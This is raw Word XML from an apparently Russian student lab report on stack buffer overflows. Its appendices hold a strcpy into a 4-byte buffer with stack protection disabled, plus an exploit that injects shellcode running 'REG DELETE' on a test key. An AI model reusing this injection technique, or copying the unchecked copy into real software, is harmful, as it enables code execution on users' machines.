    <w:p w14:paraId="2EA2FBCF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strcpy(buf,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text_arr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A2F8C2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D0B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//printf("copied text: %s\n", buf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E0C09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907BC6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E95836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14:paraId="68E9DE11" w14:textId="77777777" w:rsidR="00ED0BED" w:rsidRPr="007A5CCB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A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easy_func(</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5C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7A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14:paraId="6EF912D5" w14:textId="77777777" w:rsidR="00ED0BED" w:rsidRPr="007A5CCB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985471" w14:textId="55DCFA00" w:rsidR="00DD55D1" w:rsidRPr="007A5CCB" w:rsidRDefault="00DD55D1" w:rsidP="00ED0BED">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="1211" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196FB26F" w14:textId="1E70B484" w:rsidR="00ED0BED" w:rsidRPr="007A5CCB" w:rsidRDefault="00ED0BED" w:rsidP="00ED0BED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5CCB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC4964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95872FE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5140692B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2F0F69DE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7D5D3BEB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7CD09124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685D0C22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4A77082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94043E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SetConsoleCP(1251);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67739045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SetConsoleOutputCP(1251);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5772876C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shell_code[500] =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC22AB3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"aaaabbbb\x99\xf9\x59\x77"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ED0785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"\x90\x90\x90\x90"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4641C6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"\x90\x90\x90\x90"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28561535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"\x66\x89\xe5\x6a\x01\x67\x66\x8d\x4d\x1a\x66\x51\x66\xb8\x80\x48\xa1\x76\x66\xff\xd0\xc3\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x52\x45\x47\x20\x44\x45\x4c\x45\x54\x45\x20\x48\x4b\x43\x55\x5c\x5c\x6b\x65\x79\x20\x2f\x76\x20\x74\x65\x73\x74\x20\x2f\x66"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7868A6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36C56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command[800];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A701CBE" w14:textId="77777777" w:rsidR="00ED0BED" w:rsidRPr="00ED0BED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snprintf(command,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(command),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"C:\\Users\\danya\\source\\repos\\lab3\\Release\\defensless_2.exe \"%s\""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shell_code);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0BAED1" w14:textId="77777777" w:rsidR="00ED0BED" w:rsidRPr="007A5CCB" w:rsidRDefault="00ED0BED" w:rsidP="00ED0BE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A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system(command);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9FD2C" w14:textId="57CD7648" w:rsidR="00ED0BED" w:rsidRPr="007A5CCB" w:rsidRDefault="00ED0BED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03F9D93" w14:textId="238CB5B8" w:rsidR="003E66F4" w:rsidRPr="007A5CCB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418DA" w14:textId="57C98D2B" w:rsidR="003E66F4" w:rsidRPr="007A5CCB" w:rsidRDefault="003E66F4" w:rsidP="003E66F4">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5CCB">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6C883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6567235A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40C424C3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C32A5A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__declspec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(safebuffers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C8C8C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easy_func(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text_arr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E8A622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buf[4] = { 0 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A46EF" w14:textId="24E5476A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cpy(buf,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text_arr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C01DD5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D0B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//printf("copied text: %s\n", buf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09455A83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44ADF6E2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E504C8" w14:textId="77777777" w:rsidR="003E66F4" w:rsidRPr="00ED0BED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0B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D0B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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF54DD6" w14:textId="77777777" w:rsidR="003E66F4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0B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easy_func(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[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B7FB22" w14:textId="77777777" w:rsidR="003E66F4" w:rsidRDefault="003E66F4" w:rsidP="003E66F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398B6D" w14:textId="77777777" w:rsidR="003E66F4" w:rsidRPr="003E66F4" w:rsidRDefault="003E66F4" w:rsidP="003E66F4">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003E66F4" w:rsidRPr="003E66F4" w:rsidSect="00D60F71">
      <w:footerReference w:type="defaul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8393E" w14:textId="77777777" w:rsidR="00567ADA" w:rsidRPr="00D60F71" w:rsidRDefault="00567AD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61134FA" w14:textId="77777777" w:rsidR="00567ADA" w:rsidRPr="00D60F71" w:rsidRDefault="00567AD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D0B04" w14:textId="77777777" w:rsidR="00567ADA" w:rsidRPr="00D60F71" w:rsidRDefault="00567AD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00F5E05" w14:textId="77777777" w:rsidR="00567ADA" w:rsidRPr="00D60F71" w:rsidRDefault="00567AD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60F0CF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F6A47D0"/>
    <w:lvl w:ilvl="0" w:tplc="7298A326">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1406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B068A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA8C1418"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="114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2381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  <w:i w:val="0"/>
        <w:iCs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0E947DE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8976DF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4F47D87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0004D69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610175"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17987C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52AC5A7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B4E2D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8E8530F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27321BB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90E12EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A186F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3F74A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B94C6D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0"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="19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ECE"/>
    <w:rsid w:val="00014CDB"/>
    <w:rsid w:val="00020612"/>
    <w:rsid w:val="00021F83"/>
    <w:rsid w:val="0002442B"/>
    <w:rsid w:val="00027724"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="00036B43"/>
    <w:rsid w:val="00037B6A"/>
    <w:rsid w:val="00051B1F"/>
    <w:rsid w:val="00052897"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="000723DC"/>
    <w:rsid w:val="0007296E"/>
    <w:rsid w:val="00087219"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="00097901"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000B6F20"/>
    <w:rsid w:val="000C2C25"/>
    <w:rsid w:val="000D6252"/>
    <w:rsid w:val="000D6CC6"/>
    <w:rsid w:val="000E053D"/>
    <w:rsid w:val="000E0BEF"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="001153B4"/>
    <w:rsid w:val="001221B6"/>
    <w:rsid w:val="00141F4A"/>
    <w:rsid w:val="00145D4B"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00156500"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="00184DF5"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001B3B42"/>
    <w:rsid w:val="001C4F37"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="002359F2"/>
    <w:rsid w:val="00235F09"/>
    <w:rsid w:val="00242610"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="002540CD"/>
    <w:rsid w:val="002669A3"/>
    <w:rsid w:val="00290073"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E5217"/>
    <w:rsid w:val="002E53F7"/>
    <w:rsid w:val="002E7750"/>
    <w:rsid w:val="002F0C40"/>
    <w:rsid w:val="002F140F"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00317985"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="003228E4"/>
    <w:rsid w:val="00322EFA"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="00347734"/>
    <w:rsid w:val="0035379A"/>
    <w:rsid w:val="00361E20"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="0039450A"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003A6A81"/>
    <w:rsid w:val="003B1360"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B4179"/>
    <w:rsid w:val="003B5921"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003C30BA"/>
    <w:rsid w:val="003D0AD7"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="003E66F4"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="00410477"/>
    <w:rsid w:val="00414CE3"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00433A34"/>
    <w:rsid w:val="00440A64"/>
    <w:rsid w:val="00442614"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="004817BD"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B3DD0"/>
    <w:rsid w:val="004B4995"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004C36AC"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="005071E4"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00522F76"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="005467ED"/>
    <w:rsid w:val="00567ADA"/>
    <w:rsid w:val="0059187D"/>
    <w:rsid w:val="005A7260"/>
    <w:rsid w:val="005B79E9"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D3A67"/>
    <w:rsid w:val="005E4481"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005E6638"/>
    <w:rsid w:val="005F5D88"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="00602693"/>
    <w:rsid w:val="00610558"/>
    <w:rsid w:val="00616288"/>
    <w:rsid w:val="00620A6B"/>
    <w:rsid w:val="00624AF5"/>
    <w:rsid w:val="006251BA"/>
    <w:rsid w:val="00646EA0"/>
    <w:rsid w:val="00665589"/>
    <w:rsid w:val="00671283"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="006751B5"/>
    <w:rsid w:val="0068384B"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006D5490"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="00713756"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="00725EA8"/>
    <w:rsid w:val="00730620"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="007674C3"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="00775163"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="00785012"/>
    <w:rsid w:val="007A5CCB"/>
    <w:rsid w:val="007B51A1"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D1C02"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007D421F"/>
    <w:rsid w:val="007F3461"/>
    <w:rsid w:val="007F5ED0"/>
    <w:rsid w:val="00801608"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="00866420"/>
    <w:rsid w:val="00881E00"/>
    <w:rsid w:val="00893C5B"/>
    <w:rsid w:val="008B1C72"/>
    <w:rsid w:val="008C24A4"/>
    <w:rsid w:val="008D35C2"/>
    <w:rsid w:val="008D4BA8"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E0D6A"/>
    <w:rsid w:val="008E7DD0"/>
    <w:rsid w:val="00904017"/>
    <w:rsid w:val="0090469C"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="0093440A"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="009876AC"/>
    <w:rsid w:val="00990A17"/>
    <w:rsid w:val="009A73FB"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C10DB"/>
    <w:rsid w:val="009C2EF7"/>
    <w:rsid w:val="009C742E"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009E1CEE"/>
    <w:rsid w:val="009F033F"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A010DD"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00AA229C"/>
    <w:rsid w:val="00AA3B0A"/>
    <w:rsid w:val="00AC78CC"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD14A3"/>
    <w:rsid w:val="00AE14CB"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE1FDE"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AE79FA"/>
    <w:rsid w:val="00AF1736"/>
    <w:rsid w:val="00AF5257"/>
    <w:rsid w:val="00B11A7C"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B22F30"/>
    <w:rsid w:val="00B276CF"/>
    <w:rsid w:val="00B3432D"/>
    <w:rsid w:val="00B34335"/>
    <w:rsid w:val="00B704FB"/>
    <w:rsid w:val="00B7424D"/>
    <w:rsid w:val="00B921B9"/>
    <w:rsid w:val="00B929E1"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BB326E"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C36C3E"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C37652"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C60003"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C80D96"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00CA342E"/>
    <w:rsid w:val="00CB5865"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CE02AD"/>
    <w:rsid w:val="00CE7D30"/>
    <w:rsid w:val="00CF1594"/>
    <w:rsid w:val="00CF3650"/>
    <w:rsid w:val="00CF5012"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D27F00"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D56329"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D76629"/>
    <w:rsid w:val="00D771C7"/>
    <w:rsid w:val="00D828FA"/>
    <w:rsid w:val="00D86590"/>
    <w:rsid w:val="00D9740C"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DD55D1"/>
    <w:rsid w:val="00E0508E"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E53BF7"/>
    <w:rsid w:val="00E629BB"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00EB502D"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC1203"/>
    <w:rsid w:val="00EC2D61"/>
    <w:rsid w:val="00ED0BED"/>
    <w:rsid w:val="00ED32C0"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00EF51E3"/>
    <w:rsid w:val="00EF597D"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F110C2"/>
    <w:rsid w:val="00F11C0C"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F223E4"/>
    <w:rsid w:val="00F4751B"/>
    <w:rsid w:val="00F477DC"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F61825"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F7254E"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F754F8"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FB0270"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE001C"/>
    <w:rsid w:val="00FE2979"/>
    <w:rsid w:val="00FE7FAB"/>
    <w:rsid w:val="00FF375C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  <w15:docId w15:val="{744A8435-34F4-4C3E-A1FE-DC28241C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6D549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6712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10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Поляков</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Даниил Поляков</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-09T12:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-16T13:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>